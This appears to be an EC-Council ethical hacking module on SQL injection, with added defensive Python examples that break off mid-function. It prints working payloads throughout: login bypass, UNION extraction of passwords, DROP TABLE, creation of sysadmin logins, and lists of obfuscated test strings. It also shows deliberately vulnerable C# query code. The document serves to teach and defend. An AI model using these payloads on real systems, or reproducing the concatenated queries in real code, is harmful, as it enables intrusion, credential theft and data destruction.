Module 14
SQL Injection
Ethical Hacking and Countermeasures v8
Module 14: SQL Injection Exam 312-50
Ethical Hacking and Countermeasures Copyright by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Security News
Barclays: 97 Percent of Data Breaches Still Due to SQL Injection
Source: http://news.techworld.com
SQL injection attacks have been around for more than ten years, and security professionals are more than capable of protecting against them; yet 97 percent of data breaches worldwide are still due to an SQL injection somewhere along the line, according to Neira Jones, head of payment security for Barclaycard. Speaking at the Infosecurity Europe Press Conference in London this week, Jones said that hackers are taking advantage of businesses with inadequate and often outdated information security practices. Citing the most recent figures from the National Fraud Authority, she said that identity fraud costs the UK more than 2.7 billion every year, and affects more than 1.8 million people. "Data breaches have become a statistical certainty," said Jones. "If you look at what the public individual is concerned about, protecting personal information is actually at the same level in the scale of public social concerns as preventing crime."
SQL injection is a code injection technique that exploits security vulnerability in a website's software. Arbitrary data is inserted into a string of code that is eventually executed by a database. The result is that the attacker can execute arbitrary SQL queries or commands on the backend database server through the web application. In October
2011,
platform. This caused the visitor's browser to load an iframe with one of two remote sites. From there, the iframe attempted to plant malware on the visitor's PC via a number of browser drive-by exploits. Microsoft has been offering ASP.Net programmers information on how to protect against SQL injection attacks since at least 2005. However, the attack still managed to affect around 180,000 pages. Jones said that, with the number of interconnected devices on the planet set to exceed the number of humans by 2015, cybercrime and data protection need to take higher priority on the board's agenda. In order for this to happen, however, the Chief Information Security Officer (CISO) needs to assess the level of risk within their organisation, and take one step at a time. "I always say, if anyone says APT [advanced persistent threat] in the room, an angel dies in heaven, because APTs are not the problem," said Jones. "I'm not saying that they're not real, but let's fix the basics first. Are organisations completely certain they're not vulnerable to SQL injections? And have they coded their web application securely?" Generally it takes between 6 and 8 months for an organisation to find out it has been breached, Jones added. However, by understanding their risk profile and taking simple proactive measures, such as threat scenario modelling, companies could prevent 87 percent of attacks.
Module Objectives
This module introduces you to the concept of SQL injection and how an attacker can exploit this attack methodology on the Internet. At the end of this module, you will be familiar with:
SQL Injection
SQL Injection Attacks
SQL Injection Detection
SQL Injection Attack Characters
Testing for SQL Injection
Types of SQL Injection
Blind SQL Injection
SQL Injection Methodology
Advanced SQL Injection
Bypass Website Logins Using SQL Injection
Password Grabbing
Network Reconnaissance Using SQL Injection
SQL Injection Tools
Evasion Technique
How to Defend Against SQL Injection Attacks
SQL Injection Detection Tools
Module Flow
To understand SQL injection and its impact on the network or system, let us begin with the basic concepts of SQL injection. SQL injection is a type of code injection method that exploits security vulnerabilities in the database layer of an application. These vulnerabilities mostly occur when string-literal escape characters in user input are incorrectly filtered before the input is embedded in SQL statements, or when user input that is not strongly typed is executed without being checked.
Module flow diagram (sections include Evasion Techniques and Countermeasures)
This section introduces you to SQL injection and the threats and attacks associated with it.
SQL Injection
SQL injection is a type of web application vulnerability where an attacker can manipulate and submit a SQL command to retrieve database information. This type of attack mostly occurs when a web application executes queries using user-provided data without validating or encoding it. It can give the attacker access to sensitive information such as social security numbers, credit card numbers, or other financial data, and allows an attacker to create, read, update, alter, or delete data stored in the backend database. It is a flaw in web applications and not a database or web server issue. Most programmers are still not aware of this threat.
Scenario
Source: http://www.theregister.co.uk
Albert Gonzalez, an indicted hacker, stole 130 million credit and debit cards, the biggest identity theft case ever prosecuted in the United States. He used SQL injection attacks to install sniffer software on the companies' servers to intercept credit card data as it was being processed.
Source: http://hackmageddon.com
According to http://hackmageddon.com, SQL injection is the attack most commonly used by attackers to break the security of a web application. From the following statistics, recorded in September 2012, it is clear that SQL injection is the most serious and most frequently used type of cyberattack performed these days when compared to other attacks.
Chart (attack techniques, September 2012): SQL Injection, Unknown, DDoS, Defacement, Targeted Attack, DNS Hijack, Password Cracking, Account Hijacking, Java Vulnerability, Other
SQL Injection Threats
The following are the major threats of SQL injection:
Spoofing identity: Identity spoofing is a method followed by attackers in which people are deceived into believing that a particular email or website originated from a source when in fact it did not.
Changing prices: Another problem related to SQL injection is that it can be used to modify data. Here attackers enter an online shopping portal, change the prices of products, and then purchase the products at cheaper rates.
Tamper with database records: The main data is completely damaged by data alteration; there is even the possibility of completely replacing or deleting the data.
Escalation of privileges: Once the system is hacked, the attacker seeks the high privileges used by administrative members and gains complete access to the system as well as the network.
Complete disclosure of all the data on the system: Once the network is hacked, crucial and highly confidential data such as credit card numbers, employee details, financial records, etc. are disclosed.
Destruction of data: The attacker, after gaining complete control over the system, completely destroys the data, resulting in huge losses for the company.
Voiding the system's critical transactions: An attacker can operate the system and halt all the crucial transactions performed by the system.
Modifying the records: Attackers can modify the records of the company, which proves to be a major setback for the company's database management system.
What Is SQL Injection?
Structured Query Language (SQL) is basically a textual language that enables interaction with a database server. SQL commands such as INSERT, RETRIEVE, UPDATE, and DELETE are used to perform operations on the database. Programmers use these commands to manipulate data in the database server. SQL injection is defined as a technique that takes advantage of non-validated input vulnerabilities and injects SQL commands through a web application that are then executed in a back-end database. Programmers use sequential SQL commands with client-supplied parameters, making it easier for attackers to inject commands. Attackers can easily execute arbitrary SQL queries on the database server through a web application. Attackers use this technique either to gain unauthorized access to a database or to retrieve information directly from the database.
On the basis of the application used and the way it processes user-supplied data, SQL injection can be used to implement the attacks mentioned below:
Authentication bypass: Using this attack, an attacker logs onto an application without providing a valid user name and password and gains administrative privileges.
Information disclosure: After unauthorized entry into the network, the attacker gains access to the sensitive data stored in the database.
Compromised data integrity: The attacker changes the main content of the website and also enters malicious content into it.
Compromised availability of data: The attacker uses this type of attack to delete data related to audit information or any other crucial database information.
Remote code execution: An attacker could modify, delete, or create data, or even create new accounts with full user rights on the servers that share files and folders. It allows an attacker to compromise the host operating system.
Figure: how a web application processes a request (Internet, Firewall, Web Server, Web Application, DBMS, with OS system calls to the Operating System). In the example, a request for news ID 6329 produces the query SELECT * from news where id = 6329 and the output row ID 6329, Topic Tech, News CNN.
Step 1: The user sends a request through the web browser over the Internet to the web server.
Step 2: The web server accepts the request and forwards the request sent by the user to the applicable web application server.
Step 3: The web application server performs the requested task.
Step 4: The web application accesses the database and responds to the web server.
Step 5: The web server responds back to the user as the transaction is complete.
Step 6: Finally, the information that the user requested appears on the user's monitor.
Server-side Technologies
This technology is used on the server side of client/server applications. For achieving business success, not only information is important, but we also need speed and efficiency. Server-side technology helps us to smoothly access, deliver, store, and restore information. Various server-side technologies include ASP, ASP.NET, ColdFusion, JSP, PHP, Python, and Ruby on Rails. Server-side technologies like ASP.NET and SQL can easily be exploited using SQL injection.
Powerful server-side technologies like ASP.NET and database servers allow developers to create dynamic, data-driven websites with incredible ease.
All relational databases, including SQL Server, Oracle, IBM DB2, and MySQL, are susceptible to SQL injection attacks.
SQL injection attacks do not exploit a specific software vulnerability; instead they target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database.
The power of ASP.NET and SQL can easily be exploited by attackers using SQL injection attacks.
Example 1: Normal SQL Query
Here the term "query" is used for the commands. All the SQL code is written in the form of a query statement and finally executed. Various data operations of SQL queries include selecting data, inserting/updating data, or creating data objects such as databases and tables. All query statements begin with a clause such as SELECT, UPDATE, CREATE, or DELETE. SQL Query Examples:
Account Login form at http://juggyboy.com/BadLogin.aspx (Username: bart, Password: simpson):
    <form action="/cgi-bin/login" method="post">
    Username: <input type="text" name="username">
    Password: <input type="password" name="password">
    <input type="submit" value="Login">
    </form>
When a user provides information and clicks Submit, the browser submits a string to the web server that contains the user's credentials. This string is visible in the body of the HTTP or HTTPS POST request. SQL query at the database:
    select * from Users where (username = 'bart' and password = 'simpson');
BadLogin.aspx.cs, the server-side code that builds the query:
    private void cmdLogin_Click(object sender, System.EventArgs e)
    {
        string strCnx = "server=localhost;database=northwind;uid=sa;pwd=;";
        SqlConnection cnx = new SqlConnection(strCnx);
        cnx.Open();
        // This code is susceptible to SQL injection attacks.
        string strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text +
                        "' AND Password='" + txtPassword.Text + "'";
        int intRecs;
        SqlCommand cmd = new SqlCommand(strQry, cnx);
        intRecs = (int)cmd.ExecuteScalar();
        if (intRecs > 0)
        {
            FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
        }
        else
        {
            // The slide does not show the message text; any failure message fits here.
            lblMsg.Text = "Login attempt failed.";
        }
        cnx.Close();
    }
Example 1: SQL Injection Query
The most common operation in SQL is the query, and it is performed with the declarative SELECT statement. This SELECT command retrieves data from one or more tables. SQL queries allow a user to describe the desired data and leave the DBMS (Database Management System) responsible for optimizing, planning, and performing the physical operations. A SQL query includes a list of columns to be included in the final result following the SELECT keyword. If the information submitted by a browser to a web application is inserted into a database query without being properly checked, then there is a chance of SQL injection. An HTML form that receives the information posted by the user and passes it to an Active Server Pages (ASP) script running on an IIS web server is the best example of SQL injection. The information passed is the user name and password. These two data items are checked by querying a SQL Server database.
username: Blah' or 1=1 --
password: Springfield
The query executed is:
    SELECT Count(*) FROM Users WHERE UserName='Blah' or 1=1 --' AND Password='Springfield';
However, the ASP script builds the query from user data using the following line (username and password hold the submitted values):
    query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'";
If the user name is a single-quote character (') the effective query becomes:
    SELECT * FROM users WHERE username = ''' AND password = '[Springfield]';
This is invalid SQL syntax and produces a SQL Server error message in the user's browser:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password = ''.
    /login.asp, line 16
The quotation mark provided by the user has closed the first one, and the second generates an error because it is unclosed. At this point, an attacker can begin injecting strings into the query to customize its behavior. The content following the double hyphen (--) signifies a Transact-SQL comment.

Example 1: Code Analysis
Code analysis is the process of automated testing of the source code for the purpose of debugging before the final release of the software for sale or distribution.
A user enters a user name and password that matches a record in the Users table.
A dynamically generated SQL query is used to retrieve the number of matching rows:
    string strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text + "' AND Password='" + txtPassword.Text + "'";
The user is then authenticated and redirected to the requested page.
When the attacker enters blah' or 1=1 -- then the SQL query can look like:
    SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1 --' AND Password=''
Because a pair of hyphens designates the beginning of a comment in SQL, the query simply becomes:
    SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1
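The concatenated login query analysed above, placed beside a parameterized one, as an added example that is not part of the original module (Python with the standard-library sqlite3 module standing in for SQL Server and ADO.NET; the Users table and its single row are constructed sample data). It shows three things: the module's blah' or 1=1 -- input passes the concatenated check and fails the parameterized one; a lone quote makes the concatenated query raise a syntax error, the SQLite form of the ODBC error quoted earlier; and a request handler that logs the database error server-side and returns only a generic message, so no query or driver detail reaches the browser.

```python
import sqlite3


def make_db():
    """Constructed sample data: a Users table with one valid account."""
    cnx = sqlite3.connect(":memory:")
    cnx.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    cnx.execute("INSERT INTO Users VALUES ('bart', 'simpson')")
    cnx.commit()
    return cnx


def vulnerable_login(cnx, user, password):
    """Mirrors BadLogin.aspx: the SQL text is built by string concatenation,
    so quote characters and '--' in the input become part of the statement."""
    qry = ("SELECT Count(*) FROM Users WHERE UserName='" + user +
           "' AND Password='" + password + "'")
    return cnx.execute(qry).fetchone()[0] > 0


def safe_login(cnx, user, password):
    """Parameterized query: the SQL text is fixed and the values travel
    separately as bind parameters, so the input is only ever compared as data."""
    qry = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    return cnx.execute(qry, (user, password)).fetchone()[0] > 0


def handle_login(cnx, user, password, server_log):
    """Hardened request handler: parameterized lookup plus error handling that
    records any database error in the server log and returns only a generic
    message (compare the ODBC error page quoted in the module, which went to
    the browser)."""
    try:
        ok = safe_login(cnx, user, password)
    except sqlite3.Error as exc:
        server_log.append("login query failed: %r" % (exc,))
        return "Login attempt failed."
    return "Login OK" if ok else "Login attempt failed."


if __name__ == "__main__":
    db = make_db()
    for user, pwd in [("bart", "simpson"), ("blah' or 1=1 --", "Springfield")]:
        print(repr(user), "concatenated:", vulnerable_login(db, user, pwd),
              "parameterized:", safe_login(db, user, pwd))
    try:
        vulnerable_login(db, "'", "Springfield")
    except sqlite3.OperationalError as exc:
        print("concatenated query with a lone quote raised:", exc)
    print(handle_login(db, "'", "Springfield", []))
```

The parameterized form is the fix the rest of this module's countermeasures section builds on: it removes the string-boundary problem entirely rather than trying to filter quotes and hyphens out of the input.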
Example 2: BadProductList.aspx
Source: http://msdn.microsoft.com
This page (http://juggyboy.com/BadProductList.aspx) displays products from the Northwind database and allows users to filter the resulting list of products using a textbox called txtFilter. Like the previous example (BadLogin.aspx), the page is ripe for SQL injection attacks because the executed SQL is constructed dynamically from a user-entered value. This particular page is a hacker's paradise because it can be hijacked by the astute hacker to reveal secret information, change data in the database, damage the database records, and even create new database user accounts. Most SQL-compliant databases, including SQL Server, store metadata in a series of system tables with names such as sysobjects, syscolumns, and sysindexes. This means that a hacker could use the system tables to ascertain schema information for a database to assist in the further compromise of the database. For example, the following text entered into the txtFilter textbox might be used to reveal the names of the user tables in the database:
    UNION SELECT id, name, 0 FROM sysobjects WHERE xtype = 'U' --
The UNION statement in particular is useful to a hacker because it allows him or her to splice the results of one query onto another. In this case, the hacker has spliced the names of the user tables in the database onto the original query of the Products table. The only trick is to match the number and data types of the columns to the original query. The previous query might reveal that a table named Users exists in the database. A second query could reveal the columns in the Users table. Using this information, the hacker might enter the following into the txtFilter textbox:
    UNION SELECT 0, UserName, Password, 0 FROM Users --
Entering this query reveals the user names and passwords found in the Users table.
BadProductList.aspx.cs:
    private void cmdFilter_Click(object sender, System.EventArgs e)
    {
        dgrProducts.CurrentPageIndex = 0;
        bindDataGrid();
    }

    private void bindDataGrid()
    {
        dgrProducts.DataSource = createDataView();
        dgrProducts.DataBind();
    }

    private DataView createDataView()
    {
        string strCnx = "server=localhost;uid=sa;pwd=;database=northwind;";
        string strSQL = "SELECT ProductId, ProductName, " +
                        "QuantityPerUnit, UnitPrice FROM Products";
        // This code is susceptible to SQL injection attacks.
        if (txtFilter.Text.Length > 0)
        {
            strSQL += " WHERE ProductName LIKE '" + txtFilter.Text + "'";
        }
        SqlConnection cnx = new SqlConnection(strCnx);
        SqlDataAdapter sda = new SqlDataAdapter(strSQL, cnx);
        DataTable dtProducts = new DataTable();
        sda.Fill(dtProducts);
        return dtProducts.DefaultView;
    }
Example 2: Attack Analysis
Most websites have a search box that lets users search for data; if the application does not check the data entered into it for malicious content, attackers can use the search box to inject SQL. When you enter the value into the search box as:
    blah' UNION Select 0, username, password, 0 from users --
SQL Query Executed:
    SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products WHERE ProductName LIKE 'blah' UNION SELECT 0, username, password, 0 FROM USERS --'
After executing the SQL query, it shows results with the user names and passwords.
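A detection-side counterpart to the attack analysis above, as an added example that is not part of the original module: a small scanner (Python, standard library only) that reads web server access log lines, decodes each query-string parameter, and flags the indicators seen in Examples 1 and 2 (UNION SELECT, references to sysobjects-style system tables, comment terminators, and a semicolon starting a second statement). The log lines are constructed for this example and reuse the page names and the txtFilter parameter from the module; one of them carries a product name with an apostrophe to show why a bare quote is not treated as an indicator on its own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (Combined Log Format style), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2012:10:01:02 +0000] "GET /BadProductList.aspx?txtFilter=Chai HTTP/1.1" 200 512
10.0.0.7 - - [12/Sep/2012:10:01:09 +0000] "GET /BadProductList.aspx?txtFilter=blah%27+UNION+SELECT+id%2C+name%2C+0+FROM+sysobjects+WHERE+xtype%3D%27U%27+-- HTTP/1.1" 200 3071
10.0.0.7 - - [12/Sep/2012:10:01:15 +0000] "GET /BadProductList.aspx?txtFilter=blah%27+UNION+SELECT+0%2C+UserName%2C+Password%2C+0+FROM+Users+-- HTTP/1.1" 200 2200
10.0.0.9 - - [12/Sep/2012:10:02:40 +0000] "POST /BadLogin.aspx HTTP/1.1" 500 1800
10.0.0.5 - - [12/Sep/2012:10:03:00 +0000] "GET /BadProductList.aspx?txtFilter=Chef+Anton%27s+Gumbo+Mix HTTP/1.1" 200 600
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Each indicator is a name and a pattern applied to the decoded parameter value.
# A bare apostrophe is deliberately not an indicator: it is common in real data
# and on its own would flood the output with false positives.
INDICATORS = [
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("system-table", re.compile(r"\bsys(objects|columns|indexes)\b", re.I)),
    ("comment-terminator", re.compile(r"--|/\*")),
    ("stacked-statement", re.compile(r";\s*(drop|insert|update|delete|exec)\b", re.I)),
]


def classify_value(value):
    """Return the names of all indicators matched by one decoded parameter value."""
    return [name for name, pattern in INDICATORS if pattern.search(value)]


def scan_log(text):
    """Scan log lines; return one finding per request parameter that carries
    at least one indicator. Values are percent-decoded first, so encoded
    quotes, commas and spaces are seen the way the database would see them."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "path": parts.path,
                    "param": name,
                    "value": value,
                    "indicators": hits,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["path"], f["param"], f["indicators"])
        print("   decoded value:", f["value"])
```

The POST to BadLogin.aspx with a 500 response produces no finding because its body is not in the access log; correlating such status codes with the application's own error log is the complementary check, since the error page shown in Example 1 is exactly what a 500 on that handler would carry.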
Example 3: Updating Table
To create the UPDATE command in a SQL query, the syntax is:
    UPDATE "table_name" SET "column_1" = [new value] WHERE {condition}
For example, say we currently have a table as follows:
TABLE 14.1: Store_Information
    Store_Name    Sales    Date
    Sydney        $100     Aug-06-2012
    Melbourne     $200     Aug-07-2012
    Queensland    $400     Aug-08-2012
    Victoria      $800     Aug-09-2012
And we notice that the sales for Sydney on 08/06/2012 are actually $250 instead of $100, and that particular entry needs to be updated. To do so, we use the following SQL query:
    UPDATE Store_Information SET Sales = 250 WHERE Store_Name = "Sydney" AND Date = "08/06/2012"
The resulting table would look like this:
Table Store_Information
    Store_Name    Sales    Date
    Sydney        $250     Aug-06-2012
    Melbourne     $200     Aug-07-2012
    Queensland    $400     Aug-08-2012
    Victoria      $800     Aug-09-2012
Example 4: Adding New Records
The following example illustrates the process of adding new records to the table:
    INSERT INTO table_name (column1, column2, column3...) VALUES (value1, value2, value3...)
TABLE 14.3: Store_Information
    Store_Name    Sales    Date
    Sydney        $250     Aug-06-2012
    Melbourne     $200     Aug-07-2012
    Queensland    $400     Aug-08-2012
    Victoria      $800     Aug-09-2012
    INSERT INTO table_name ("store_name", "sales", "date") VALUES ("Adelaide", "$1000", "08/10/2012")
Figure: attacker launching SQL injection through the JuggyBoy.com Forgot Password form (Email Address field; the form promises "Your password will be sent to your registered email address"). Value entered in the Email Address field:
    blah'; INSERT INTO jb-customers ('jb-email', 'jb-passwd', 'jb-login_id', 'jb-last_name') VALUES ('jason@springfield.com', 'hello', 'jason', 'jason springfield');
Example 5: Identifying the Table Name
Value entered in the JuggyBoy.com Forgot Password form (Email Address field):
    blah' AND 1=(SELECT COUNT(*) FROM mytable); --
You will need to guess table names here.
SQL Query Executed:
    SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE jb-email = 'blah' AND 1=(SELECT COUNT(*) FROM mytable); --';
Example 6: Deleting a Table
[Figure: the JuggyBoy.com Forgot Password form on the SQL injection vulnerable website]
SQL Query Executed:
    SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE jb-email = 'blah'; DROP TABLE Creditcard; ';
FIGURE 14.10: Deleting Table
Module Flow
So far, we have discussed various concepts of SQL injection. Now we will discuss how to test for SQL injection. SQL injection attacks are attacks on web applications that rely on databases in the background to store and produce data. Here attackers tamper with the web application's input and try to inject their own SQL commands into those issued by the database.
[Figure: module flow diagram; remaining topics: Evasion Techniques, Countermeasures]
This section focuses on SQL injection attack characteristics and their detection.
Testing for SQL Injection
Step 1: Check if the web application connects to a Database Server in order to access some data.
Step 2: List all input fields, hidden fields, and post requests whose values could be used in crafting a SQL query.
Step 3: Attempt to inject codes into the input fields to generate an error.
Step 4: Try to insert a string value where a number is expected in the input field.
Step 5: The UNION operator is used in SQL injections to join a query to the original query; it combines the result-set of two or more SELECT statements.
Step 6: Detailed error messages provide a wealth of information to an attacker in order to execute SQL injection.
Detailed error messages returned by the application:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /shopping/buy.aspx, line 52
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'test' to a column of data type int. /visa/credit.aspx, line 17
Note: If applications do not provide detailed error messages and return a simple '500 Server Error' or a custom error page, then attempt blind injection techniques.
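The lookup behind the Forgot Password form, as an added example written for this page (it is not code from the slides or from JuggyBoy.com): the string concatenation that the examples exploit beside a parameterised version, a strict check for the numeric id from Step 4, and the generic error handling that the note above refers to. The jb_customers table, its columns and its two rows are constructed for the demonstration, and SQLite stands in for the SQL Server shown in the error messages.

```python
"""Vulnerable string concatenation beside a parameterised query, plus generic
error handling. Added example: the jb_customers table and its rows are
constructed here and SQLite stands in for the SQL Server in the slides."""
import re
import sqlite3

AUDIT_LOG = []  # server-side record of database errors (never sent to the client)


def build_db():
    """In-memory database with a constructed customer table (two sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE jb_customers ("
        "jb_email TEXT, jb_passwd TEXT, jb_login_id TEXT, jb_last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO jb_customers VALUES (?, ?, ?, ?)",
        [("alice@example.com", "s3cret", "alice", "Anders"),
         ("bob@example.com", "hunter2", "bob", "Baker")],
    )
    return conn


def lookup_vulnerable(conn, email):
    """The defect from the examples: the input is pasted into the statement text,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT jb_email, jb_passwd, jb_login_id, jb_last_name "
           "FROM jb_customers WHERE jb_email = '" + email + "'")
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, email):
    """Same query with a bound parameter: the value travels separately from the
    statement text, so quotes and keywords inside it are only data."""
    sql = ("SELECT jb_email, jb_passwd, jb_login_id, jb_last_name "
           "FROM jb_customers WHERE jb_email = ?")
    return conn.execute(sql, (email,)).fetchall()


def parse_id(raw):
    """Step 4 from the defender's side: a numeric parameter must be digits only.
    Returns the int, or None if the value is anything else."""
    return int(raw) if re.fullmatch(r"\d{1,9}", raw) else None


def handle_forgot_password(conn, email, lookup=lookup_parameterised):
    """Request handler: database errors are logged in full server-side, but the
    client only ever sees a generic message, which is what forces the blind
    techniques described later in this module."""
    try:
        rows = lookup(conn, email)
    except sqlite3.Error as exc:
        AUDIT_LOG.append(f"db error for email={email!r}: {exc}")
        return "500 Server Error"
    return f"{len(rows)} row(s) matched"


if __name__ == "__main__":
    db = build_db()
    probe = "blah' OR '1'='1"  # tautology from the testing strings in this module
    print(len(lookup_vulnerable(db, probe)), "rows via concatenation")
    print(len(lookup_parameterised(db, probe)), "rows via bound parameter")
    print(handle_forgot_password(db, "blah'", lookup_vulnerable))
    print(AUDIT_LOG[-1])
```

With the concatenated query the tautology returns every customer row; with the bound parameter it returns none, and a lone quote produces a database error that the handler converts into a generic response while the full driver message goes to the server-side log.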
Characters and functions used when testing for SQL injection:
    Character                  Function
    ' or "                     Character string indicators
    -- or #                    Single-line comment
    /*...*/                    Multiple-line comment
    +                          Addition, concatenate (or space in url)
    ||                         (Double pipe) concatenate
    %                          Wildcard attribute indicator
    ?Param1=foo&Param2=bar     URL Parameters
    PRINT                      Useful as non-transactional command
    @variable                  Local variable
    @@variable                 Global variable
    waitfor delay '0:0:10'     Time delay
    @@version                  Displays SQL server version
Method 1: Function Testing
This testing falls within the scope of black box testing, and as such, should require no knowledge of the inner design of the code or logic.
Method 2: Fuzzing Testing
Fuzz testing is an adaptive SQL injection testing technique used to discover coding errors by inputting a massive amount of random data and observing the changes in the output, or by inputting enough data to crash the web application.
Method 3: Static/Dynamic Testing
Static/dynamic testing is the manual analysis of the web application source code.
Example of Function Testing:
    http://juggyboy/?parameter=123
    http://juggyboy/?parameter=1'
    http://juggyboy/?parameter=1'#
    http://juggyboy/?parameter=1"
    http://juggyboy/?parameter=1 AND 1=1--
    http://juggyboy/?parameter=1'--
    http://juggyboy/?parameter=1 AND 1=2--
    http://juggyboy/?parameter=1'/*
    http://juggyboy/?parameter=1' AND '1'='1
    http://juggyboy/?parameter=1 order by 1000
character) as the input data to catch instances where the user input is used as part of a SQL identifier without any input sanitization.
Detecting SQL Modification
Send long strings of single quote characters (or right square brackets or double quotes). These max out the return values from the REPLACE and QUOTENAME functions and might truncate the command variable used to hold the SQL statement.
Detecting Truncation Issues
Send long strings of junk data, just as you would send strings to detect buffer overruns; this action might throw SQL errors on the page.
Testing String: ' (single quote)
  Variations:
    value') or ('1'='2
    1') and ('1'='2
    1') or ('ab'='a'+'b
    1') or ('ab'='a''b
    1') or ('ab'='a'||'b
Testing String: '; drop table users--
  Variations:
    ';[SQL Statement];--
    ');[SQL Statement];--
    ;[SQL Statement];#
    );[SQL Statement];#
Testing String: admin'--
  Variations:
    admin')--
    admin')#
Testing String: 1 or 1=1
  Variations:
    1) or 1=1
    1) or (1=1
    ' or '1'='1
    ') or '1'='1
    value or 1=2
    value) or (1=2
    value + 0
Testing String: 1 and 1=2
  Variations:
    1) and (1=2
    ' and '1'='2
    ') and '1'='2
Testing String: -1 and 1=2--
  Variations:
    -1) and 1=2--
Testing String: 1 or 'ab'='a''b'
  Variations:
    1 or 'ab'='a'||'b'
    1) or ('ab'='a'+'b'
Testing String: /*comment*/
Testing Strings
    or 1=1
    " or "a"="a
    Admin' OR '
    ' having 1=1
    ' OR 'text' = N'text'
    ' OR 2 > 1
    ' OR 'text' > 't'
    ' union select
    Password:*/=1
    ' or 1/*
    %22+or+isnull%281%2F0%29+%2F*
    %27+OR+%277659%27%3D%277659
    ' group by userid having 1=1
    EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
    CREATE USER name IDENTIFIED BY 'pass123'
    /**/OR/**/1/**/=/**/1
    ' or 1 in (select @@version)
    ' union all select @@version
    ' OR 'unusual' = 'unusual'
    ' OR 'something' = 'some'+'thing'
    ' OR 'something' like 'some%'
    ' OR 'whatever' in ('whatever')
    ' OR 2 BETWEEN 1 and 3
    ' or username like char(37);
    UNI/**/ON SEL/**/ECT
    '; EXEC ('SEL' + 'ECT US' + 'ER')
    +or+isnull%281%2F0%29+%2F*
    ' and 1 in (select var from temp)
    '; drop table temp
    exec sp_addlogin 'name', 'password'
    @var select @var as var into temp end --
    exec sp_addsrvrolemember 'name', 'sysadmin'
    GRANT CONNECT TO name; GRANT RESOURCE TO name;
    union select * from users where login = char(114,111,111,116);
    10.10.1.2
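A detection pass over request logs, as an added example for this page (it is not from the slides or from any product): each parameter value is URL-decoded, the /**/ comment trick is stripped so that UNI/**/ON SEL/**/ECT is seen as UNION SELECT, and the value is matched against patterns derived from the testing strings listed above. The log format, client addresses and paths are constructed for the example.

```python
"""Pattern-based detection of SQL injection testing strings in request
parameters. Added example; the access-log lines, addresses and paths below are
constructed, and the patterns follow the testing strings listed on this page."""
import re
from urllib.parse import unquote_plus

# Rule name -> pattern. Inputs are lower-cased before matching.
RULES = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    # ' or 1=1, " or "a"="a, ' OR 'text' > 't', ' OR 2 BETWEEN 1 and 3, ' and '1'='2
    ("boolean_condition", re.compile(
        r"\b(?:or|and)\b\s*(?:'[^']*'|\"[^\"]*\"|\w+)\s*(?:=|<|>|like\b|between\b|in\b)")),
    # '; drop table users--, '; EXEC (...), 1; WAITFOR DELAY ...
    ("stacked_statement", re.compile(
        r";\s*(?:exec|execute|drop|grant|create|insert|update|delete|waitfor|if|declare)\b")),
    ("time_delay", re.compile(r"\bwaitfor\s+delay\b|\bbenchmark\s*\(|\bsleep\s*\(")),
    ("isnull_div_zero", re.compile(r"\bisnull\s*\(\s*1\s*/\s*0\s*\)")),
    ("metadata_probe", re.compile(
        r"\b(?:information_schema|sysobjects|syscolumns|sysdatabases|sp_addlogin|sp_addsrvrolemember)\b|@@version")),
    # 'SEL' + 'ECT US' and 'a'||'b' keyword splicing
    ("string_splice", re.compile(r"'\s*(?:\+|\|\|)\s*'")),
    # UNI/**/ON SEL/**/ECT style comment obfuscation
    ("inline_comment", re.compile(r"\w/\*.*?\*/\w")),
    # admin'--, ' or 1/*, ...#
    ("comment_terminator", re.compile(r"(?:--|#|/\*)\s*$")),
]


def variants(raw):
    """URL-decode, lower-case, and produce two comment-stripped forms: one with
    /*...*/ removed outright (rejoins UNI/**/ON) and one with each comment
    replaced by a space (keeps /**/OR/**/1/**/=/**/1 tokenised)."""
    decoded = unquote_plus(raw).lower()
    joined = re.sub(r"/\*.*?\*/", "", decoded)
    spaced = re.sub(r"/\*.*?\*/", " ", decoded)
    return (decoded, joined, spaced)


def classify(raw):
    """Names of every rule that matches a single parameter value, in RULES order."""
    forms = variants(raw)
    return [name for name, rx in RULES if any(rx.search(f) for f in forms)]


def scan_log(lines):
    """Constructed log format: 'client method path?query status'.
    Returns (client, parameter, matched rule names) for each flagged parameter."""
    findings = []
    for line in lines:
        client, _method, target, _status = line.split(" ", 3)
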